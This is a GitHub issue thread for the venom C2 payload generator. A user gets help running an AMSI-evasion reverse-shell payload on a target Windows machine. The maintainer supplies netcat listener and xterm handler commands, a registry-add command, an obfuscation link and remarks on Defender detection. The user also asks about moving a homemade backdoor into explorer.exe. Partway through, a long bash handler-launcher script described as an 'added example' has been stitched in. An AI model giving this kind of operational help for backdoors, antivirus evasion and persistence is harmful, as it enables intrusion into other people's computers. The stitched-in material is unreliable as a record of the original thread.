r00t-3xp10it / venom

venom - C2 shellcode generator/compiler/handler

Listener not starting on Amsi Evasion Payload Number 1 #63

Closed Vedant-Bhalgama closed 4 years ago

Vedant-Bhalgama commented 4 years ago

Hi!

I am using the File Less Payload in the Amsi-Evasion module. The payload gets delivered successfully and I start the .ps1 script with PowerShell on the target computer. It executes successfully, but on the Kali side it shows "Press Any Key to start Handler"; I press a key and the handler does not start at all. How can I start the listener manually for the .ps1 script?

r00t-3xp10it commented 4 years ago

Remark: amsi evasion agent nº 4 does not use a netcat listener; it uses PowerShell to receive the TCP connection back.

Manually start the netcat listener:

sudo nc -lvp <port number>

Note-To-Self

The Amsi Evasion sub-menu does not check for the existence of netcat on the attacker side, because netcat is installed by default on Linux distros ... TODO: add a netcat check ???...

Vedant-Bhalgama commented 4 years ago

So do I need to install netcat on the target machine? Because I already have netcat installed on Kali Linux.

r00t-3xp10it commented 4 years ago

netcat is only needed on the attacker machine (listener). Something is wrong with your netcat install ..

Execute the following command to check if nc is working fine:

sudo nc -lvp <port number>

xterm -T "netcat" -e "sudo nc -lvp <port number>" <-- this is the command venom uses to spawn the netcat listener (handler)

Vedant-Bhalgama commented 4 years ago

Ok, and as you told me that I need to install xterm for chars.raw, will pip install xterm work?

r00t-3xp10it commented 4 years ago

pip is for PYTHON ... apt-get install xterm <-- this is the command we need to install xterm ..

That's why your listener does not start: it requires the xterm console to spawn netcat .. xterm official webpage
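The handler venom spawns is the single xterm command quoted above, and this thread shows two ways it silently fails: netcat is missing (the check the "Note-To-Self" says is still a TODO) or xterm is missing. The script below is an added example, not venom's own code; it reproduces venom's handler command line and adds the prerequisite checks, falling back to running the listener in the current terminal when xterm is absent. The `-lvp` flag set is the one used on this page (traditional netcat syntax); the `nc`/`netcat`/`ncat` binary names searched for and the default port 4444 are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not part of venom): start a netcat handler the way venom does,
# but check netcat, xterm and the port first instead of failing silently.
# Usage: source ./start_handler.sh && start_handler 4444

# Return 0 if a command is on PATH.
have_cmd() { command -v "$1" >/dev/null 2>&1; }

# Accept only a numeric TCP port in 1..65535.
validate_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the first netcat binary found (assumed names), or return 1 if none.
find_netcat() {
    local c
    for c in nc netcat ncat; do
        if have_cmd "$c"; then
            printf '%s\n' "$c"
            return 0
        fi
    done
    return 1
}

# Build the exact command line venom uses to spawn the handler.
build_handler_cmd() {
    printf 'xterm -T "netcat" -e "sudo nc -lvp %s"\n' "$1"
}

# Check prerequisites, then spawn the listener (xterm if present, else inline).
start_handler() {
    local port="$1" nc_bin
    if ! validate_port "$port"; then
        echo "[-] invalid port: '$port' (need 1-65535)" >&2
        return 2
    fi
    if ! nc_bin="$(find_netcat)"; then
        echo "[-] no netcat binary (nc/netcat/ncat) on PATH; install netcat first" >&2
        return 3
    fi
    if have_cmd xterm; then
        echo "[+] spawning handler in xterm on port $port"
        xterm -T "netcat" -e "sudo $nc_bin -lvp $port" &
    else
        echo "[!] xterm not installed (apt-get install xterm); listening in this terminal" >&2
        sudo "$nc_bin" -lvp "$port"
    fi
}
```

Source the file and call `start_handler <port>`; a non-zero return (2 for a bad port, 3 for no netcat) is what the venom menu would otherwise swallow as "handler doesn't start".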

Vedant-Bhalgama commented 4 years ago

Ok, and on the Windows machine do I have to start the netcat listener? Or will the .ps1 file start it when run?

Vedant-Bhalgama commented 4 years ago

Hi, I am trying the Windows OS payloads, number 20 in particular. I run this attack and all I see is this console window. Even Windows Defender detected it.

Vedant-Bhalgama commented 4 years ago

Hi, the File Less stager works now, but what can I do from netcat? Can I execute system commands? Or open Notepad?

r00t-3xp10it commented 4 years ago

https://github.com/r00t-3xp10it/venom/issues/63#issuecomment-654572534 <-- that's the reason why I have written the amsi evasion sub-menu: those techniques are being detected now ..

https://github.com/r00t-3xp10it/venom/issues/63#issuecomment-654573792 <-- netcat gives you access to a console prompt where you can use anything from cmd commands to powershell commands (the sky is the limit if you are familiar with those languages) ... in other words: netcat allows you to interact with everything on the remote host programmatically ..

Vedant-Bhalgama commented 4 years ago

So can I execute any command or something? Or maybe upload files or download them? And can you give tips on manually making these files more undetectable?

r00t-3xp10it commented 4 years ago

You can not upload/download files using netcat alone .. but we can use netcat to spawn, for example, an FTP service that allows us to upload/download ..

Obfuscation: https://github.com/r00t-3xp10it/hacking-material-books/blob/master/obfuscation/simple_obfuscation.md

Vedant-Bhalgama commented 4 years ago

Alright! I just have one question now: how can I execute commands while I have the connection on netcat?

Vedant-Bhalgama commented 4 years ago

Hi, I had a question: in Python, can we do process migration? Because I have made my own backdoor in Python and now I want it to run under a parent process such as explorer.exe.

r00t-3xp10it commented 4 years ago

Examples:

netstat -ano <-- use the native netstat application to display a list of TCP/UDP connections

cmd.exe /c reg add "HKCU\Software\Microsoft\Startup" /t REG_DWORD /d 1 /f <-- use cmd.exe to add a registry key

Vedant-Bhalgama commented 4 years ago

Hi! I was thinking: how can we convert our Python backdoor to .ps1? Or to a macro file? To XML?